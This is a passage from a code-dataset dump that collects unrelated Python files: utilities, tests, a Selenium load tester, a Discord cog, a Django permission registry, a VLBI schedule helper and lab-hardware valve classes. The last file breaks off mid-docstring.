content stringlengths 5 1.05M |
|---|
# Greedy banknote counter: break a value into banknotes, largest first.
NOTAS = (100, 50, 20, 10, 5, 2, 1)


def contar_notas(valor, notas=NOTAS):
    """Return (denomination, count) pairs covering `valor` greedily.

    Args:
        valor (int): non-negative amount to break into banknotes.
        notas (tuple[int, ...]): denominations, largest first.

    Returns:
        list[tuple[int, int]]: one (denomination, count) pair per denomination.
    """
    resultado = []
    for nota in notas:
        # Integer division (the original used float `/`) gives the note
        # count; the remainder carries over to smaller denominations.
        resultado.append((nota, valor // nota))
        valor %= nota
    return resultado


if __name__ == "__main__":
    valor = int(input("Digite o valor: "))
    for nota, quantidade in contar_notas(valor):
        print("Quantidade de notas %d: %d" % (nota, quantidade))
|
#!/usr/bin/python
from . import * |
#!/usr/bin/env python
from __future__ import unicode_literals
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium import webdriver
import threading
import random
import time
import json
# Developed with Python 2.7.6, PhantomJS 1.9.8
# Tested on OS X and Linux
def find_element_and_fill(browser, selector, value, field_value):
    """Wait for an element located by name or id, then type text into it.

    Args:
        browser: selenium WebDriver instance.
        selector (str): locator strategy, "name" or "id".
        value (str): the name/id attribute value to look up.
        field_value (str): text to send to the element.

    Raises:
        ValueError: if `selector` is neither "name" nor "id".
    """
    if selector == "name":
        WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.NAME, value)))
        browser.find_element_by_name(value).send_keys(field_value)
    elif selector == "id":
        WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, value)))
        browser.find_element_by_id(value).send_keys(field_value)
    else:
        # Raising a bare string is a TypeError in modern Python; raise a
        # proper exception instead.
        raise ValueError("Invalid Selector type for %s" % value)
def find_element_and_click(browser, selector, value):
    """Wait for an element located by name or id, then click it.

    Args:
        browser: selenium WebDriver instance.
        selector (str): locator strategy, "name" or "id".
        value (str): the name/id attribute value to look up.

    Raises:
        ValueError: if `selector` is neither "name" nor "id".
    """
    if selector == "name":
        WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.NAME, value)))
        browser.find_element_by_name(value).click()
    elif selector == "id":
        WebDriverWait(browser, TIMEOUT).until(EC.presence_of_element_located((By.ID, value)))
        browser.find_element_by_id(value).click()
    else:
        # Raising a bare string is a TypeError in modern Python; raise a
        # proper exception (also fixes the "buttom" typo in the message).
        raise ValueError("Invalid Selector type for login button %s" % value)
# Browser Actions
def authenticate(instance):
    """Log browser number `instance` in through the site's login form.

    Reads the module-level `authentication` and `url_details` config dicts
    and drives `browser_instances[instance]` through the form.
    """
    print("Browser %s : Authenticating as %s..." % ((instance+1), authentication['username']['field_value']))
    login_page = "%s://%s/%s" % (url_details['protocol'], url_details['url'], authentication['browser_authentication']['endpoint'])
    browser_instances[instance].get(login_page)
    # Fill username/password only when the corresponding field is enabled.
    if authentication['username']['enabled']:
        find_element_and_fill(browser_instances[instance],
                              authentication['username']['dom_element_type'],
                              authentication['username']['dom_value'],
                              authentication['username']['field_value'])
    if authentication['password']['enabled']:
        find_element_and_fill(browser_instances[instance],
                              authentication['password']['dom_element_type'],
                              authentication['password']['dom_value'],
                              authentication['password']['field_value'])
    # Submit the form.
    find_element_and_click(browser_instances[instance],
                           authentication['submit_button']['dom_element_type'],
                           authentication['submit_button']['dom_value'])
def go_to_page(instance, page):
    """Navigate browser number `instance` to the absolute URL `page`."""
    print("Browser %s : Navigating to %s..." % (instance+1, page))
    browser_instances[instance].get(page)
def teardown(instance):
    """Quit browser number `instance`, shutting down its driver process."""
    print("Browser %s : Quitting browser..." % (instance+1))
    browser_instances[instance].quit()
def worker(instance):
    """Worker-thread body for one webdriver instance.

    Optionally authenticates, visits every configured endpoint in order
    (sleeping between pages so AJAX content can load), then quits the
    browser.
    """
    # Begin by logging into the site if enabled
    if authentication['browser_authentication']['enabled']:
        authenticate(instance)
        time.sleep(AUTH_SLEEP_INTERVAL)
    # Visit each page
    for endpoint in url_details['endpoints']:
        full_url = "%s://%s/" % (url_details['protocol'], url_details['url'])
        go_to_page(instance, "%s%s" % (full_url, endpoint))
        time.sleep(PAGE_SLEEP_INTERVAL)
    # Clean up browsers after test
    teardown(instance)
# Program Logic
if __name__ == '__main__':
    # How long to wait for an element to appear before throwing a TimeoutException
    TIMEOUT = 5
    # How long to sleep before requesting the next page (to wait for all AJAX elements to load)
    # Alternatively, you can add a WebDriverWait until certain elements are present, but this is hard to generalize
    PAGE_SLEEP_INTERVAL = 1
    # How long to wait after authenticating (to wait for all AJAX elements to load)
    AUTH_SLEEP_INTERVAL = 2
    # Import configured totals for each browser type
    with open('config/browser_totals.json', 'r') as tally_of_browsers:
        browsers = json.load(tally_of_browsers)
    # Import list of endpoints as well as protocol and base url
    with open('config/url_list.json', 'r') as list_of_urls:
        url_details = json.load(list_of_urls)
    # Import authentication details (for sites that require login)
    with open('config/authentication.json', 'r') as login_params:
        authentication = json.load(login_params)
    # Initialize empty list to hold browser instances
    browser_instances = []
    # Spawn the configured number of browsers of each type
    for browser_type in browsers:
        for x in range(0, browsers[browser_type]):
            if browser_type == 'headless':
                # PhantomJS Capabilities for custom timeout length
                capabilities = webdriver.DesiredCapabilities.PHANTOMJS
                capabilities["phantomjs.page.settings.resourceTimeout"] = 1000
                # Arguments to disable all SSL errors for unverified HTTPS connections
                service_args = ['--ignore-ssl-errors=true', '--web-security=false']
                browser_instances.append(webdriver.PhantomJS(desired_capabilities=capabilities, service_args=service_args))
                # Simpler equivalent of the original browser_instances[-1:][0]
                browser_instances[-1].implicitly_wait(3)
            elif browser_type == 'firefox':
                browser_instances.append(webdriver.Firefox())
            elif browser_type == 'chrome':
                browser_instances.append(webdriver.Chrome())
    # Print test parameters
    print("\nRunning with a total of %s browsers:" % str(len(browser_instances)))
    for browser in browsers:
        print('\t%s instances of %s browser' % (browsers[browser], browser))
    # The original used the Python-2-only statement form `print '\n'`;
    # the call form below prints the same output on both Python 2 and 3.
    print('\n')
    # Spawn one worker thread for each browser instance.
    # Chrome/PhantomJS/Firefox browsers should be separate subprocesses, so there is likely
    # to be no great advantage for swapping the threading and multiprocessing libraries
    threads = []
    for i, browser in enumerate(browser_instances):
        t = threading.Thread(target=worker, args=(i,))
        threads.append(t)
        t.start()
    # Wait for all threads to complete
    for t in threads:
        t.join()
    print("\nAll tests complete\n")
|
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
class Fftw(Package):
    """Used to test that a few problematic concretization
    cases with the old concretizer have been solved by the
    new ones.
    """

    # Mock metadata: neither URL is actually fetched during these tests.
    homepage = "http://www.example.com"
    url = "http://www.example.com/fftw-1.0.tar.gz"

    # Placeholder checksums -- this mock package is never really installed.
    version(2.0, 'foobar')
    version(1.0, 'foobar')

    # Optional MPI support; the dependency only activates with +mpi.
    variant('mpi', default=False, description='Enable MPI')
    depends_on('mpi', when='+mpi')
|
import asyncio
import discord
from discord.ext import commands
class AutoRoles(commands.Cog):
    """Background cog that keeps the support guild's premium role in sync.

    Periodically grants the hard-coded premium role to members flagged as
    premium in the database and removes it from everyone else.
    """

    def __init__(self, bot):
        self.bot = bot
        # The Database cog must already be loaded when this cog is constructed.
        self.db = self.bot.get_cog("Database")
        # Flag polled by the background loop so cog_unload can stop it.
        self.stop_loops = False
        self.bot.loop.create_task(self.premium_sweep())

    def cog_unload(self):
        # Signal the sweep loop to exit at its next wake-up.
        self.stop_loops = True

    async def premium_sweep(self):
        """Endless loop: reconcile the premium role roughly every 10 minutes."""
        while True:
            for member in self.bot.get_guild(self.bot.support_guild_id).members:
                if await self.db.is_premium(member.id):
                    try:
                        await member.add_roles(
                            self.bot.get_guild(self.bot.support_guild_id).get_role(732635033738674186))
                    except discord.HTTPException:
                        # Best-effort (e.g. missing permissions); skip member.
                        pass
                else:
                    try:
                        await member.remove_roles(
                            self.bot.get_guild(self.bot.support_guild_id).get_role(732635033738674186))
                    except discord.HTTPException:
                        pass
            # Sleep 10 minutes in 1-second slices so unloading is noticed fast.
            for i in range(0, 60 * 10, 1):
                await asyncio.sleep(1)
                if self.stop_loops:
                    return
def setup(bot):
    """discord.py extension entry point: register the AutoRoles cog."""
    bot.add_cog(AutoRoles(bot))
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from struct import unpack
from .uuid import Uuid
class ValueState:
    """Parses an EvData event payload: a 16-byte UUID optionally followed by
    a little-endian 64-bit float value.

    typedef struct {
        PUUID uuid; // 128-Bit uuid
        double dVal; // 64-Bit Float (little endian) value
    } PACKED EvData;
    """

    def __init__(self, payload):
        """
        Args:
            payload (bytes): 16 bytes of UUID, plus 8 value bytes when the
                total length is 24.
        """
        self.uuid = Uuid(payload[0:16])
        # Default to None so getValue() no longer raises AttributeError for
        # payloads that carry no value part (the original only set `value`
        # inside the length check).
        self.value = None
        if len(payload) == 24:
            # unpack() returns a 1-tuple; getValue() extracts the scalar.
            self.value = unpack('<d', payload[-8:])

    def getUuid(self):
        """Return the parsed UUID (whatever Uuid.get() yields)."""
        return self.uuid.get()

    def getValue(self):
        """Return the float value, or None if the payload carried none."""
        if self.value is None:
            return None
        return self.value[0]
import math
import matplotlib.pyplot as plt
import numpy as np
# Interactive mode: plots refresh without blocking, and the (initially empty)
# figure window is shown up front.
plt.ion()
plt.show()
def run():
    """Plot normalized performance curves (output power, torque, efficiency)
    for four Hobbywing Quicrun motor variants at a fixed supply voltage.

    All per-motor constants are 1x4 row vectors, one column per variant
    (3600/2850/2170/1800 kV); column vectors of speed broadcast against them.
    """
    V = 7.4  # supply voltage [V]
    kV = np.array([[3600, 2850, 2170, 1800]])  # velocity constants [rpm/V]
    Pmax = np.array([[240, 180, 125, 95]])  # max power per variant -- presumably watts; confirm
    Ipmax = np.array([[62, 50, 35, 28]])  # max current ratings; currently unused
    R0 = np.array([[0.0183, 0.0289, 0.0488, 0.0747]])  # winding resistance [ohm]
    I0 = np.array([[2.8, 2.4, 1.6, 1.3]])  # no-load current [A]
    vmax = kV * V / 60  # rev/s; the commented factor would convert to rad/s: * 2 * math.pi
    # Speed axis from 0 to the fastest motor's top speed, as a column vector.
    v = np.linspace(0, vmax[0,0])[:,np.newaxis]
    # Input power estimate as written (no-load term plus a load term that
    # decays linearly with speed) -- NOTE(review): verify against datasheet.
    Pin = I0 * V + (V / R0 - I0 * V) * (1 - v / vmax)
    # Torque assumed to fall linearly from stall to zero at vmax.
    T = Pmax / (kV * (V / 2) / 60 * math.pi * 2) * (1 - v / vmax)
    Pout = T * v
    eta = Pout / Pin
    # Normalization constants so all curves share the 0..1 vertical axis.
    max_T = np.amax(T)
    max_p = np.amax(Pout)
    clr = ['b', 'g', 'r', 'c']
    for i in range(kV.shape[1]):
        # Mask out speeds beyond this particular motor's own top speed.
        msk = np.squeeze(v < vmax[0,i])
        plt.plot(v[msk], Pout[msk,i] / max_p, clr[i] + '--')
        plt.plot(v[msk], T[msk,i] / max_T, clr[i] + ':')
        plt.plot(v[msk], eta[msk,i], clr[i] + '-')
    plt.ylim([0, 1])
    plt.ylabel('Rel.: \\eta (-), Torque (:), Pout (--)')
    plt.xlabel('Speed (rps)')
    plt.title('Performance curves for Hobbywing Quicrun motors')
if __name__ == '__main__':
    run()
    # Block until the user presses Enter so the interactive plot stays open.
    input()
# Maps link domains to Font Awesome icon specifiers; the "fa:" prefix is
# presumably consumed by the rendering layer -- verify against the consumer.
DOMAIN_ICONS = {
    "youtube.com": "fa:fab fa-youtube",
    "youtu.be": "fa:fab fa-youtube",
    "reddit.com": "fa:fab fa-reddit-alien",
    "github.com": "fa:fab fa-github",
}
|
#!/usr/bin/env python3
"""
Merges several csv files (the first file serves as base)
Assumes that they have the same set of columns,
but the columns do not have to be in the same order
"""
import csv
import sys
def main():
    """Append the rows of every CSV named in argv[2:] onto argv[1].

    All files must share the same set of columns; column ORDER may differ,
    since rows are re-mapped onto the base file's header via DictWriter.
    Exits with status 1 when fewer than two files are given.
    """
    if len(sys.argv) < 3:
        print("Wrong number of arguments: specify at least two files to merge!")
        sys.exit(1)  # sys.exit is explicit; bare exit() is meant for the REPL
    # Read the base file's header; it defines the output column order.
    # newline="" is what the csv module requires for correct newline handling.
    with open(sys.argv[1], "r", newline="") as merge_to:
        header = csv.DictReader(merge_to).fieldnames
    # Append every other file's rows, re-ordered to match the base header.
    with open(sys.argv[1], "a", newline="") as merge_to:
        writer = csv.DictWriter(merge_to, fieldnames=header)
        for path in sys.argv[2:]:
            with open(path, "r", newline="") as merge_from:
                for row in csv.DictReader(merge_from):
                    writer.writerow(row)
# Script entry point.
if __name__ == '__main__':
    main()
|
from django.db.models import ManyToOneRel, Model
# Permission types generated for every registered field.
FIELD_PERMISSION_TYPES = ["view", "change"]


class FieldPermissionsModelRegistry(object):
    """Registry of models whose individual fields get view/change permissions.

    Models are registered with optional include/exclude field lists. Lookups
    match registered models by `_meta.model_name` rather than class identity,
    so e.g. a proxy class with the same model name resolves to the same
    configuration.
    """

    def __init__(self):
        self._registry = {}

    def register(self, cls, include_fields=None, exclude_fields=None):
        """Register `cls` (a Model subclass) for field-permission handling.

        Args:
            cls: the model class to register.
            include_fields: field names to cover, or None for all fields.
            exclude_fields: field names to skip, or None for none.

        Raises:
            TypeError: if `cls` is not a Model subclass.
        """
        if not issubclass(cls, Model):
            raise TypeError("cls should be a Model")
        self._registry[cls] = {
            "include_fields": "__all__" if include_fields is None else include_fields,
            "exclude_fields": [] if exclude_fields is None else exclude_fields,
        }

    def _find_conf(self, klass):
        """Return the registered config matching `klass` by model name, or None."""
        model_name = klass._meta.model_name
        for registered, conf in self._registry.items():
            if registered._meta.model_name == model_name:
                return conf
        return None

    def in_registry(self, klass):
        """True if a model with the same model_name has been registered."""
        return self._find_conf(klass) is not None

    def get_include_fields_for(self, klass):
        """Included fields for `klass`: "__all__" or a list ([] if unregistered)."""
        conf = self._find_conf(klass)
        return conf["include_fields"] if conf else []

    def get_exclude_fields_for(self, klass):
        """Excluded field names for `klass` ([] if unregistered)."""
        conf = self._find_conf(klass)
        return conf["exclude_fields"] if conf else []

    def get_models(self):
        """Return the registered model classes."""
        return self._registry.keys()

    def _permitted_fields(self, klass):
        """Yield the fields of `klass` that pass the include/exclude filters."""
        include_fields = self.get_include_fields_for(klass)
        exclude_fields = self.get_exclude_fields_for(klass)
        for field in klass._meta.get_fields(include_parents=True):
            if include_fields != "__all__" and field.name not in include_fields:
                continue
            if field.name in exclude_fields:
                continue
            yield field

    def get_model_fields(self, klass):
        """Return the list of fields covered by field permissions for `klass`."""
        return list(self._permitted_fields(klass))

    def get_field_permissions_for_model(self, klass):
        """Build (codename, description) permission pairs for covered fields.

        For every permitted field and each type in FIELD_PERMISSION_TYPES,
        produces e.g. ("view_book_title", "Can view field title in book").
        """
        opts = klass._meta
        perms = []
        for field in self._permitted_fields(klass):
            field_name = field.name
            verbose_field_name = field.name
            if hasattr(field, "verbose_name"):
                verbose_field_name = field.verbose_name
            elif isinstance(field, ManyToOneRel):
                if field.related_name:
                    verbose_field_name = (
                        field.related_model._meta.verbose_name_plural
                    )
                else:
                    # If related_name is not set, add permission for the
                    # default "<field name>_set" reverse accessor.
                    field_name = field_name + "_set"
                    verbose_field_name = field_name + " set"
            for permission_type in FIELD_PERMISSION_TYPES:
                perms.append(
                    (
                        "{}_{}_{}".format(permission_type, opts.model_name, field_name),
                        "Can {} field {} in {}".format(
                            permission_type,
                            verbose_field_name.lower(),
                            opts.verbose_name,
                        ),
                    )
                )
        return perms


# Module-level singleton used by the rest of the application.
field_permissions = FieldPermissionsModelRegistry()
|
# -*- coding: utf-8 -*-
from django import forms
class DocumentForm(forms.Form):
    """Single-field form for uploading one document."""

    # The uploaded file; rendered with the label below.
    docfile = forms.FileField(
        label='Select a file'
    )
|
import json
import random
from os import environ
# NOTE(review): this file is a Terraform template (rendered via templatefile);
# the dollar-brace placeholders below are substituted at deploy time, so the
# raw file is NOT valid Python until rendered.
def lambda_handler(event, context):
    """CloudFront (Lambda@Edge) request handler returning an HTTP redirect.

    Redirects to the configured domain, preserving the original request's
    protocol and, when no redirect path is configured, its URI.
    """
    request = event['Records'][0]['cf']['request']
    # Template ternary: keep the request URI unless a fixed path is configured.
    redirect_url = ${redirect_path == null ? "request['uri']": "${redirect_path}"}
    protocol = request['headers']['cloudfront-forwarded-proto'][0]['value']
    response = {
        'status': '${redirect_code}',
        'statusDescription': '${redirect_description}',
        'headers': {
            'location': [{
                'key': 'Location',
                'value': protocol + '://${redirect_domain}' + redirect_url
            }]
        }
    }
    return response
|
#!/usr/bin/env python
# Fetch, drudg, and post-process (SNP/PRC) a VLBI schedule for the Onsala
# twin telescopes; the hostname selects the telescope code (fulla -> oe,
# freja -> ow).
# NOTE(review): uses raw_input, so this script requires Python 2.
import sys, os
import datetime
# Get path of script
scriptpath = os.path.dirname(os.path.realpath(__file__))
# take schedule name as input, e.g. b21096
exp = sys.argv[1]
# Check if we should download schedule, or assume it already exists locally
dl = False
if (len(sys.argv)==3) and (sys.argv[2]=="dl"):
    dl = True
# Confirm with the operator before overwriting any existing files.
check = raw_input("Ready to fetch, drudg, and modify (SNP/PRC) experiment " + exp + ". NOTE: this will overwrite any existing files with this experiment name. Type go and hit enter to continue: " )
if check.strip() == "go":
    if dl:
        # Get schedule via wget, saving it in /usr2/sched/, e.g. /usr2/sched/vt9248.skd
        print("INFO: Downloading sked file...")
        wgetcmd = "fesh -f " + exp
        os.system(wgetcmd)
        print("INFO: ...done.")
    # get hostname of this FS machine, fulla or freja
    host = os.uname()[1]
    # Translate hostname to telescope 2 letter code for drudg
    tels = {"fulla":"oe", "freja":"ow"}
    tel = tels[host]
    # TODO: Could also read location.ctl if setup properly
    # drudg sked file for SNP.
    print("INFO: host is " + host + " so running drudg for telescope " + tel + " ...")
    drudgcmd = "drudg /usr2/sched/" + exp + ".skd " + tel + " 3 0"
    os.system(drudgcmd)
    print("INFO: ...done.")
    # change setupsx to setupbb in SNP file; the inserted '"' comments out
    # the original command for the Field System
    print("INFO: Changing setupsx to setupbb and commenting in snp file...")
    sedcmd = "sed -i 's/setupsx/\"setupbb/g' /usr2/sched/"+exp+tel+".snp"
    os.system(sedcmd)
    print("INFO: Commenting out setupxx in snp file...")
    sedcmd = "sed -i 's/setupxx/\"setupxx/g' /usr2/sched/"+exp+tel+".snp"
    os.system(sedcmd)
    #print("INFO: ... and comment out disk_pos and ready_disk and checkmk5...")
    #sedcmd = "sed -i 's/^disk_pos/\"disk_pos/g' /usr2/sched/"+exp+tel+".snp"
    #os.system(sedcmd)
    #sedcmd = "sed -i 's/^ready_disk/\"ready_disk/g' /usr2/sched/"+exp+tel+".snp"
    #os.system(sedcmd)
    #sedcmd = "sed -i 's/^checkmk5/\"checkmk5/g' /usr2/sched/"+exp+tel+".snp"
    #os.system(sedcmd)
    print("INFO: ...done.")
    # copy template PRC file to /usr2/proc/expST.prc where ST is oe or ow
    print("INFO: Instead of drudging for PRC, copy template PRC...")
    cpcmd = "cp " + scriptpath + "/VGOS_default_prc." + tel + " /usr2/proc/" + exp + tel + ".prc"
    os.system(cpcmd)
    snpf = "/usr2/sched/"+exp+tel+".snp"
    # Store lines in array
    lines = []
    for line in open(snpf):
        lines.append(line)
    # Find first timetag; assumes a 20xx start year (breaks after 2099).
    # NOTE(review): `starttime` stays unbound if no "!20" line exists.
    for line in lines:
        if line.startswith("!20"):
            starttime = datetime.datetime.strptime(line.strip()[1:], "%Y.%j.%H:%M:%S")
            break
    # Schedule the prepant procedure 10 minutes before the first scan.
    preptime = (starttime+datetime.timedelta(minutes=-10)).strftime("%Y.%j.%H:%M:%S")
    #print("starttime=", starttime, "preptime=", preptime)
    # Rewrite the SNP file, inserting prepant + its timetag after the
    # "Rack=DBBC" line.
    wf = open(snpf, "w")
    for line in lines:
        wf.write(line)
        if "Rack=DBBC" in line:
            #wf.write("mk5=datastream=clear\n")
            #wf.write("mk5=datastream=add:{thread}:*\n")
            wf.write("prepant\n")
            wf.write("!"+preptime + "\n")
    wf.close()
    print("All done.")
else:
    print("Did not get go as answer so not doing anything.")
|
# Create a file, write a flag line to it, then read it back and print it.
# Fixed: the original used `f.close` without parentheses (a bare attribute
# access), so the file was never explicitly closed; `with` closes it
# deterministically. An explicit encoding avoids platform-default surprises.
with open("flag.txt", "w", encoding="utf-8") as f:
    f.write("quiero salir de fiesta pero estoy haciendo programación :) ")

with open("flag.txt", "r", encoding="utf-8") as f:
    print(f.read())
|
# -*- coding: utf-8 -*-
import pydicom
import pytest
from pynetdicom2 import asceprovider
from pydicom import uid
from pynetdicom2 import dsutils
from tiny_pacs import ae
from tiny_pacs import db
from tiny_pacs import event_bus
from tiny_pacs import storage
@pytest.fixture
def memory_storage():
    """Fixture: an InMemoryStorage wired to a fresh event bus and database.

    The database handle itself is unused; constructing it registers its
    handlers on the bus, and ON_START finishes initialization.
    """
    bus = event_bus.EventBus()
    _db = db.Database(bus, {})
    _storage = storage.InMemoryStorage(bus, {})
    bus.broadcast(event_bus.DefaultChannels.ON_START)
    return _storage
def test_new_file(memory_storage: storage.InMemoryStorage):
    """new_file() should create a StorageFiles record marked not-yet-stored."""
    memory_storage.new_file(
        '1.2.3.4',
        '1.2.3',
        '1.2.3.5',
        'test'
    )
    _file = storage.StorageFiles.get(storage.StorageFiles.sop_instance_uid == '1.2.3.4')
    assert _file.sop_instance_uid == '1.2.3.4'
    assert _file.sop_class_uid == '1.2.3'
    assert _file.transfer_syntax == '1.2.3.5'
    assert _file.file_name == 'test'
    assert _file.is_stored == False
def test_successful_storage(memory_storage: storage.InMemoryStorage):
    """ON_STORE_DONE should flip the pending record's is_stored flag."""
    memory_storage.new_file(
        '1.2.3.4',
        '1.2.3',
        '1.2.3.5',
        'test'
    )
    ds = pydicom.Dataset()
    ds.SOPInstanceUID = '1.2.3.4'
    memory_storage.bus.broadcast(storage.StorageChannels.ON_STORE_DONE, ds)
    _file = storage.StorageFiles.get(storage.StorageFiles.sop_instance_uid == '1.2.3.4')
    assert _file.is_stored == True
def test_failure_storage(memory_storage: storage.InMemoryStorage):
    """ON_STORE_FAILURE should delete the pending record entirely."""
    memory_storage.new_file(
        '1.2.3.4',
        '1.2.3',
        '1.2.3.5',
        'test'
    )
    ds = pydicom.Dataset()
    ds.SOPInstanceUID = '1.2.3.4'
    memory_storage.bus.broadcast(storage.StorageChannels.ON_STORE_FAILURE, ds)
    with pytest.raises(storage.StorageFiles.DoesNotExist):  # pylint: disable=no-member
        storage.StorageFiles.get(storage.StorageFiles.sop_instance_uid == '1.2.3.4')
def test_get_files(memory_storage: storage.InMemoryStorage):
    """Round-trip: a dataset written via ON_GET_FILE and marked stored is
    returned by on_store_get_files with its class UID and transfer syntax.
    """
    ts = uid.ImplicitVRLittleEndian
    ctx = asceprovider.PContextDef(1, '1.2.3', ts)
    cmd_ds = pydicom.Dataset()
    cmd_ds.AffectedSOPClassUID = '1.2.3'
    cmd_ds.AffectedSOPInstanceUID = '1.2.3.4'
    # Ask storage for a writable file handle plus the data start offset.
    fp, start = memory_storage.bus.send_one(ae.AEChannels.ON_GET_FILE, ctx, cmd_ds)
    ds = pydicom.Dataset()
    ds.SOPInstanceUID = '1.2.3.4'
    ds.SOPClassUID = '1.2.3'
    ds_stream = dsutils.encode(ds, ts.is_implicit_VR, ts.is_little_endian)
    fp.write(ds_stream)
    fp.seek(start)
    memory_storage.bus.broadcast(storage.StorageChannels.ON_STORE_DONE, ds)
    for sop_class_uid, _ts, ds in memory_storage.on_store_get_files(['1.2.3.4']):
        assert sop_class_uid == '1.2.3'
        assert _ts == ts
        assert ds.SOPInstanceUID == '1.2.3.4'
def test_get_files_empty(memory_storage: storage.InMemoryStorage):
    """Files that were registered but never marked stored are not returned."""
    memory_storage.new_file(
        '1.2.3.4',
        '1.2.3',
        '1.2.3.5',
        'test'
    )
    results = memory_storage.on_store_get_files(['1.2.3.4'])
    assert not len(list(results))
|
from abc import ABC, abstractmethod
from deluca.lung.devices.pins import Pin, PWMOutput
import os
import numpy as np
class SolenoidBase(ABC):
    """Abstract base class for valve-like devices using valve terminology.

    Supports both normally-closed and normally-open hardware (the "form" of
    the valve), exposed as a human-readable string backed by an int code.
    """

    # Human-readable form name -> internal integer encoding.
    _FORMS = {"Normally Closed": 0, "Normally Open": 1}

    def __init__(self, form="Normally Closed"):
        """
        Args:
            form (str): The form of the solenoid; can be either
                `Normally Open` or `Normally Closed`
        """
        self.form = form

    @property
    def form(self) -> str:
        """The human-readable form of the valve."""
        code_to_name = {code: name for name, code in self._FORMS.items()}
        return code_to_name[self._form]

    @form.setter
    def form(self, form):
        """Validate the requested form and store its integer encoding.

        Args:
            form (str): `Normally Open` or `Normally Closed`

        Raises:
            ValueError: if `form` is not a recognized form name.
        """
        if form in self._FORMS:
            self._form = self._FORMS[form]
        else:
            raise ValueError("form must be one of {}".format(self._FORMS.keys()))

    @abstractmethod
    def open(self):
        """ Energizes valve if Normally Closed. De-energizes if Normally Open."""

    @abstractmethod
    def close(self):
        """ De-energizes valve if Normally Closed. Energizes if Normally Open."""

    @property
    @abstractmethod
    def is_open(self) -> bool:
        """ Returns True if valve is open, False if it is closed"""
class OnOffValve(SolenoidBase, Pin):
    """A Pin that speaks valve terminology for its methods.

    Supports both normally-closed and normally-open valves (the "form" of
    the valve).
    """

    _FORMS = {"Normally Closed": 0, "Normally Open": 1}

    def __init__(self, pin, form="Normally Closed", gpio=None):
        """
        Args:
            pin (int): The number of the pin to use
            form (str): The form of the solenoid; can be either
                `Normally Open` or `Normally Closed`
            gpio (PigpioConnection): pigpiod connection to use; if not
                specified, a new one is established
        """
        self.form = form
        Pin.__init__(self, pin, gpio)
        SolenoidBase.__init__(self, form=form)

    def open(self):
        """ Energizes valve if Normally Closed. De-energizes if Normally Open."""
        # _form is 0 for Normally Closed (energize -> 1), 1 for Normally Open.
        self.write(0 if self._form else 1)

    def close(self):
        """ De-energizes valve if Normally Closed. Energizes if Normally Open."""
        self.write(0 if self.form == "Normally Closed" else 1)

    @property
    def is_open(self) -> bool:
        """ Implements parent's abstractmethod; returns True if valve is open, False if it is closed"""
        energized = bool(self.read())
        return energized if self.form == "Normally Closed" else not energized
class PWMControlValve(SolenoidBase, PWMOutput):
    """An extension of PWMOutput which incorporates linear
    compensation of the valve's response.

    Only Normally Closed valves are supported. The `setpoint` is expressed
    on a 0-100 scale (percent open); the underlying PWM `duty` is 0-1.
    """

    def __init__(self, pin, form="Normally Closed", frequency=None, response=None, gpio=None):
        """
        Args:
            pin (int): The number of the pin to use
            form (str): The form of the solenoid; must be `Normally Closed`
            frequency (float): The PWM frequency to use.
            response (str): "/path/to/response/curve/file"; None selects an
                identity response (`setpoint == duty * 100`).
            gpio (PigpioConnection): pigpiod connection to use; if not
                specified, a new one is established

        Raises:
            NotImplementedError: if `form` is not `Normally Closed`.
        """
        PWMOutput.__init__(self, pin=pin, initial_duty=0, frequency=frequency, gpio=gpio)
        SolenoidBase.__init__(self, form=form)
        if form != "Normally Closed":
            raise NotImplementedError("Normally Open PWM control valves have not been implemented")
        # Direction of the last setpoint change; opening and closing use
        # different calibration columns of the response curve.
        self._rising = True
        self._load_valve_response(response_path=response)

    @property
    def is_open(self) -> bool:
        """ Implements parent's abstractmethod; returns True if valve is open, False if it is closed"""
        # bool() so callers always get a plain Python bool, not a numpy bool.
        return bool(self.setpoint > 0)

    def open(self):
        """ Implements parent's abstractmethod; fully opens the valve

        Fixed: the setpoint scale is 0-100 (see the setter's validation and
        the response curve's first column), so "fully open" is 100.0 -- the
        original value of 1.0 only opened the valve about 1%.
        """
        self.setpoint = 100.0

    def close(self):
        """ Implements parent's abstractmethod; fully closes the valve"""
        self.setpoint = 0.0

    @property
    def setpoint(self) -> float:
        """The linearized setpoint corresponding to the current duty cycle
        according to the valve's response curve.

        Returns:
            float: 0-100, the current flow as a percentage of maximum
        """
        return self.inverse_response(self.duty, self._rising)

    @setpoint.setter
    def setpoint(self, setpoint):
        """Determine & write the duty cycle corresponding to the requested
        linearized setpoint according to the valve's response curve.

        Args:
            setpoint (float): A number between 0 and 100 representing how much to open the valve

        Raises:
            ValueError: if `setpoint` is outside [0, 100].
        """
        if not 0 <= setpoint <= 100:
            raise ValueError("setpoint must be between 0 and 100 for an expiratory control valve")
        # Direction matters: pick the opening or closing calibration column.
        self._rising = setpoint > self.setpoint
        self.duty = self.response(setpoint, self._rising)

    def response(self, setpoint, rising=True):
        """Map a 0-100 setpoint to a 0-1 PWM duty cycle via the response curve.

        Response curves are specific to individual valves. Different curves
        are calibrated to rising=True (valve opening) or rising=False (valve
        closing), as different characteristic flow behavior can be observed.

        Args:
            setpoint (float): A number between 0 and 100 representing how much to open the valve
            rising (bool): Whether the requested setpoint is higher than the last

        Returns:
            float: The PWM duty cycle corresponding to the requested setpoint
        """
        # Nearest-neighbour lookup in the setpoint column (column 0).
        idx = (np.abs(self._response_array[:, 0] - setpoint)).argmin()
        return self._response_array[idx, 1] if rising else self._response_array[idx, 2]

    def inverse_response(self, duty_cycle, rising=True):
        """Inverse of response(): map a 0-1 duty cycle back to a 0-100 setpoint.

        Args:
            duty_cycle: The PWM duty cycle
            rising (bool): Whether the requested setpoint is higher than the last

        Returns:
            float: The setpoint of the valve corresponding to `duty_cycle`
        """
        column = 1 if rising else 2
        idx = (np.abs(self._response_array[:, column] - duty_cycle)).argmin()
        return self._response_array[idx, 0]

    def _load_valve_response(self, response_path):
        """Load a response curve: column 0 is the setpoint (0-100), columns
        1 and 2 are the opening/closing duty cycles (0-1).

        Flow through a proportional valve is generally nonlinear with respect
